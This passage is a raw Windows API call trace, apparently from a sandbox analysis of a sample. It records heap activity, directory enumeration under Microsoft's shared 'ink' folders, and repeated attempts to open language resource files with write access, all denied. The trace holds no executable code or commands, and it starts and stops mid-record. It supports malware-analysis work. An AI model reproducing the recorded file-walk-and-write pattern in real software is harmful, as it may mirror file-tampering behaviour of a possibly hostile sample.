| out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0769b1e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0100.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0100.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0100.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0100.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0100.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0100.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0100.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60348 [0100.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0100.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0100.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60348 | out: hHeap=0x20000) returned 1 [0100.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.166] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0100.166] AreFileApisANSI () returned 1 [0100.166] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT", lpUsedDefaultChar=0x0) returned 57 [0100.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0100.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.166] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0100.166] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0100.166] AreFileApisANSI () returned 1 [0100.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a5b0 [0100.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT") returned 57 [0100.167] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.167] GetLastError () returned 0x5 [0100.167] GetLastError () returned 0x5 [0100.167] SetLastError (dwErrCode=0x5) [0100.167] GetLastError () returned 0x5 [0100.167] SetLastError (dwErrCode=0x5) [0100.167] GetLastError () returned 0x5 [0100.167] SetLastError (dwErrCode=0x5) [0100.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0100.167] AreFileApisANSI () returned 1 [0100.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.167] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x69db0 [0100.167] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT") returned 57 [0100.167] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.167] GetLastError () returned 0x5 [0100.167] GetLastError () returned 0x5 [0100.167] SetLastError (dwErrCode=0x5) [0100.167] GetLastError () returned 0x5 [0100.167] SetLastError (dwErrCode=0x5) [0100.167] GetLastError () returned 0x5 [0100.167] SetLastError (dwErrCode=0x5) [0100.167] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0100.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0100.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.168] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0100.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0100.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0100.168] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa076a026, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35250 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e7a0 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.168] FindFirstFileExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\*", fInfoLevelId=0x0, lpFindFileData=0x327efb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x327efb8) returned 0x78250 [0100.168] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b8a1d2, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0769b1e, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a3a0736, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0100.168] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327ed3c | out: lpFindFileData=0x327ed3c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e9592f9, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e9592f9, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e9592f9, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0100.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0100.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0100.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0100.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0100.168] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0100.168] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ebe0 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ba8 [0100.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0100.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0100.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6ea48 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0100.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0100.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8ced8 [0100.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0100.169] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.169] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.169] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.169] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ced8 | out: hHeap=0x20000) returned 1 [0100.169] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0100.169] AreFileApisANSI () returned 1 [0100.169] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 73 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0100.169] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.169] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0100.169] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0100.170] AreFileApisANSI () returned 1 [0100.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.170] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x854e0 [0100.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui") returned 73 [0100.170] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0100.170] GetFileType (hFile=0x27c) returned 0x1 [0100.170] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0100.170] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0100.170] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0100.170] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0100.170] CloseHandle (hObject=0x27c) returned 1 [0100.171] AreFileApisANSI () returned 1 [0100.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0100.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85ee0 [0100.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x85ee0, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui") returned 73 [0100.171] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.171] GetLastError () returned 0x5 [0100.171] GetLastError () returned 0x5 [0100.171] SetLastError (dwErrCode=0x5) [0100.171] GetLastError () returned 0x5 [0100.171] SetLastError (dwErrCode=0x5) [0100.171] GetLastError () returned 0x5 [0100.171] SetLastError (dwErrCode=0x5) [0100.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85ee0 | out: hHeap=0x20000) returned 1 [0100.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0100.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.171] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0100.171] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.171] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.171] FindNextFileW (in: hFindFile=0x78250, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x327f510, ftCreationTime.dwHighDateTime=0x90, ftLastAccessTime.dwLowDateTime=0x327f498, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x8d2d0, ftLastWriteTime.dwHighDateTime=0x327f288, nFileSizeHigh=0x90, nFileSizeLow=0x0, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="t ", cAlternateFileName="渘Ĉ㪀ā湈Ĉ蘿̧⨀")) returned 0 [0100.171] FindClose (in: hFindFile=0x78250 | out: hFindFile=0x78250) returned 1 [0100.171] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0100.172] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35130 [0100.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0100.172] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35130 | out: hHeap=0x20000) returned 1 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ebe0 | out: hHeap=0x20000) returned 1 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35250 | out: hHeap=0x20000) returned 1 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0100.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0100.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0100.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0100.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0100.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0100.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fdc8 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0100.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fdc8 | out: hHeap=0x20000) returned 1 [0100.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.246] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0100.246] AreFileApisANSI () returned 1 [0100.246] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP", lpUsedDefaultChar=0x0) returned 57 [0100.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53370 [0100.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.246] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0100.246] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0100.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0100.247] AreFileApisANSI () returned 1 [0100.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a9b0 [0100.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a9b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP") returned 57 [0100.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.247] GetLastError () returned 0x5 [0100.247] GetLastError () returned 0x5 [0100.247] SetLastError (dwErrCode=0x5) [0100.247] GetLastError () returned 0x5 [0100.247] SetLastError (dwErrCode=0x5) [0100.247] GetLastError () returned 0x5 [0100.247] SetLastError (dwErrCode=0x5) [0100.247] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0100.247] AreFileApisANSI () returned 1 [0100.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0100.247] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x72) returned 0x6a3b0 [0100.247] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53370, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=57 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP") returned 57 [0100.247] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0100.248] GetLastError () returned 0x5 [0100.248] GetLastError () returned 0x5 [0100.248] SetLastError (dwErrCode=0x5) [0100.248] GetLastError () returned 0x5 [0100.248] SetLastError (dwErrCode=0x5) [0100.248] GetLastError () returned 0x5 [0100.248] SetLastError (dwErrCode=0x5) [0100.248] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0100.248] HeapFree (in: hHeap=0x20000, 